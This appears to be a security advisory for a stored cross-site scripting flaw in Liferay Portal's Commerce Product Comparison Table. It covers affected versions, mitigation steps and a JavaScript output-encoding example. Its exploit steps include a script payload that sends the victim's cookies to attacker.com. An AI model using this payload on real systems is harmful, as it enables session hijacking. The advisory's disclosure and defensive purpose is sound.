Liferay Portal, Cross-Site Scripting, CVE-2025-22094 (Moderate)


The CVE-2025-22094 vulnerability is a stored Cross-Site Scripting (XSS) flaw within the Commerce Product Comparison Table widget of Liferay Portal and DXP. The vulnerability exists because the application fails to properly sanitize user-supplied input in the “Name” field of a Commerce Product. When a malicious actor with product creation privileges injects a crafted JavaScript payload into this field, the payload is stored in the database. The payload is then unsafely rendered in the HTML output of the Product Comparison Table widget whenever the manipulated product is viewed. This allows the attacker’s script to execute in the browser of any user viewing the comparison table, enabling session hijacking, defacement, or actions performed within the context of the victim’s authenticated session.
Platform: Liferay Portal/DXP
Version: 7.4.0-7.4.3.111
Vulnerability: Stored XSS
Severity: Moderate

Date: 2025-10-08

Prediction: 2025-10-30

What Undercode Say:

`curl -s "https://api.github.com/advisories/GHSA-xxxx-xxxx-xxxx" | jq '.severity, .published_at'`

`docker run -p 8080:8080 liferay/portal:7.4.3.110`


How Exploit:

1. Attacker logs into Liferay.

2. Navigates to Commerce > Products.

3. Creates/edits a product name.

4. Injects `<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>` into the "Name" field.

5. Saves the product.

6. Victim views the product comparison table.

7. Malicious script executes in the victim's browser.

Protection from this CVE

Update to Liferay Portal/DXP patched versions: 7.4.3.112 or 6.0.134. Implement strict output encoding for all user-controlled data rendered in the UI. Apply a Content Security Policy (CSP) to mitigate the impact of potential XSS flaws. Enforce input validation and sanitization on all product-related fields.
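As an added illustration of the output-encoding advice above (example code written for this page, not Liferay's own widget code): a small JavaScript renderer that HTML-encodes a product name at the point it is placed into a comparison-table cell, shown beside the unsafe concatenation pattern. The product records and the payload string are constructed sample data, and the CSP value is an assumed example policy, not one taken from the advisory.

```javascript
// Added example, not Liferay code. Demonstrates contextual output encoding
// for user-controlled product fields rendered into an HTML table.

// Encode the characters that can change meaning in an HTML text or
// double-quoted attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored name is concatenated into markup as-is,
// so a name containing a <script> tag becomes live script in the page.
function renderRowUnsafe(product) {
  return `<tr><td>${product.name}</td><td>${product.price}</td></tr>`;
}

// Fixed pattern: every user-controlled field is encoded when it is output,
// regardless of what validation happened when it was saved.
function renderRowSafe(product) {
  return `<tr><td>${escapeHtml(product.name)}</td><td>${escapeHtml(product.price)}</td></tr>`;
}

// Whole comparison table using the safe row renderer.
function renderComparisonTable(products) {
  const rows = products.map(renderRowSafe).join("");
  return `<table><tr><th>Product</th><th>Price</th></tr>${rows}</table>`;
}

// Minimal check used in tests: does rendered markup contain a raw <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample data: one benign product and one whose name carries a
// harmless marker payload of the kind the advisory describes.
const SAMPLE_PRODUCTS = [
  { name: "Widget A", price: "9.99" },
  { name: "<script>alert(1)</script>", price: "19.99" },
];

// Assumed example policy: disallowing inline script limits the impact if an
// encoding gap is ever missed. The header value is illustrative only.
const EXAMPLE_CSP = "default-src 'self'; script-src 'self'; object-src 'none'";

// Stand-alone demonstration.
console.log(renderRowUnsafe(SAMPLE_PRODUCTS[1]));
console.log(renderComparisonTable(SAMPLE_PRODUCTS));
console.log("Content-Security-Policy: " + EXAMPLE_CSP);
```

Encoding at output time is the durable fix because it protects every render path, including data that was stored before input validation was tightened; the CSP is a second layer that reduces what an injected script can do rather than a replacement for encoding.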

Impact:

Theft of user sessions. Unauthorized account actions. Website defacement. Escalation of privileges within the portal.


Sources:

Reported By: github.com